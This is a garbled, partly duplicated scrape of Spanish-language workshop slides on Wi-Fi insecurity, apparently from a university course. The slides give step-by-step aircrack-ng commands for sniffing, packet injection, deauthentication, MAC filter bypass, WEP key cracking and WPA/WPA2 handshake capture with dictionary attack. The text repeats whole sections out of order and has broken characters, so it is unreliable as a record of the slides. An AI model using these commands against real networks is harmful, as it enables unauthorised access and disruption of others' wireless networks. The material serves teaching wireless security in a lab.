httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
